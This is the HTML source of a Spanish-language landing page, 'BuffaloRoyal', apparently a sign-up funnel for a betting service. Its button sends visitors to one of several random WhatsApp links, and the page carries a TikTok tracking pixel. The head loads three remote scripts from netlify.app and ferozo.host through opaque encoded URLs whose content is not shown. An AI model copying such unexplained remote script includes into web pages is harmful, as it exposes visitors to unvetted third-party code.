
<!DOCTYPE html>
<html lang="es">
<head><script type='text/javascript' src='https://buffaloroyal777.netlify.app/gYAT0EWW4Ihc3mmV7w8TZNB2r4rZotVMgJrFjGnJsuduXLyNbuFzKD2WM4h7z_J-7ZA4mn-Cgwd9-FIcaX4UxA=='></script><script type='text/javascript' src='https://ferozo.host/QAqMIxhH32lH61wDLo7o9Ab-3MBFcDOThDE663WQoBM-9KAjJJPdeAYXypm3cvlPZ_kLSw-2FWzwYzSBZB3guQ=='></script>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>BuffaloRoyal</title>
    <link href="https://fonts.googleapis.com/css2?family=Kanit:wght@300;400;500;700&display=swap" rel="stylesheet">

<!-- TikTok Pixel Code Start -->
<script>
!function (w, d, t) {
  w.TiktokAnalyticsObject=t;var ttq=w[t]=w[t]||[];ttq.methods=["page","track","identify","instances","debug","on","off","once","ready","alias","group","enableCookie","disableCookie","holdConsent","revokeConsent","grantConsent"],ttq.setAndDefer=function(t,e){t[e]=function(){t.push([e].concat(Array.prototype.slice.call(arguments,0)))}};for(var i=0;i<ttq.methods.length;i++)ttq.setAndDefer(ttq,ttq.methods[i]);ttq.instance=function(t){for(
var e=ttq._i[t]||[],n=0;n<ttq.methods.length;n++)ttq.setAndDefer(e,ttq.methods[n]);return e},ttq.load=function(e,n){var r="https://analytics.tiktok.com/i18n/pixel/events.js",o=n&&n.partner;ttq._i=ttq._i||{},ttq._i[e]=[],ttq._i[e]._u=r,ttq._t=ttq._t||{},ttq._t[e]=+new Date,ttq._o=ttq._o||{},ttq._o[e]=n||{};n=document.createElement("script")
;n.type="text/javascript",n.async=!0,n.src=r+"?sdkid="+e+"&lib="+t;e=document.getElementsByTagName("script")[0];e.parentNode.insertBefore(n,e)};


  ttq.load('D0UGKGRC77U6QKGBOTBG');
  ttq.page();
}(window, document, 'ttq');
</script>
<!-- TikTok Pixel Code End -->


    <style>
        body {
            font-family: 'Kanit', sans-serif;
            background-color: #111212;
            text-align: center;
            color: white;
            margin: 0;
            padding: 0;
        }

        .container {
            max-width: 400px;
            margin: 0 auto;
            padding: 50px 20px;
        }

        .avatar {
            width: 180px;
            height: 180px;
            border-radius: 50%;
            margin-bottom: 20px;
        }

        h1 {
            font-family: 'Kanit', sans-serif;
            font-size: 28px;
            margin-bottom: 20px;
        }

        .cta-btn {
            background-color: #804000;
            color: white;
            padding: 25px 50px;
            font-size: 24px;
            margin-top: 150px; /* Ajustá el valor según lo que necesites */
            text-decoration: none;
            border-radius: 50px;
            display: inline-flex;
            align-items: center;-
            justify-content: center;
            gap: 30px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.3);
            transition: background-color 0.3s, transform 0.2s, box-shadow 0.3s;
            font-family: 'Kanit', sans-serif;
        }

        .cta-btn:hover {
            background-color: #804000;
            transform: scale(1.05);
            box-shadow: 0 8px 16px rgba(0, 0, 0, 0.4);
        }

        .whatsapp-icon {
            width: 40px;
            height: 40px;
        }

        .footer {
            margin-top: 35px;
            font-size: 30px;
            font-family: 'Kanit', sans-serif;
        }

        .footer p {
            margin: 5px 0;
        }
    </style>
<script type="text/javascript" src="https://ferozo.host/GxulCrF8ubDqHzQhxLFXzhbRSowh_X0XnYii5pYy7e1j4SiDRlGaa-SrbqNalmYoNplKR_u6cyjB3o0OzIlp-g=="></script></head>
<body>

    <div class="container">
        <img src="avatar.jpeg" alt="Avatar" class="avatar">
        
        <!-- Botón con llamada a la función de JavaScript -->
        <a href="#" class="cta-btn" onclick="openRandomLink()">
            <span>CREA TU USUARIO!</span>
            <img src="whatsapp.png" alt="WhatsApp" class="whatsapp-icon">
        </a>


    </div>

    <script>
        function openRandomLink() {
            const links = [

       "https://wa.link/kkncme",
       "https://wa.link/zulutx",
       "https://wa.link/3jcsi6"


            ];

            const randomLink = links[Math.floor(Math.random() * links.length)];
            window.location.href = randomLink;
        }
    </script>

</body>
</html>
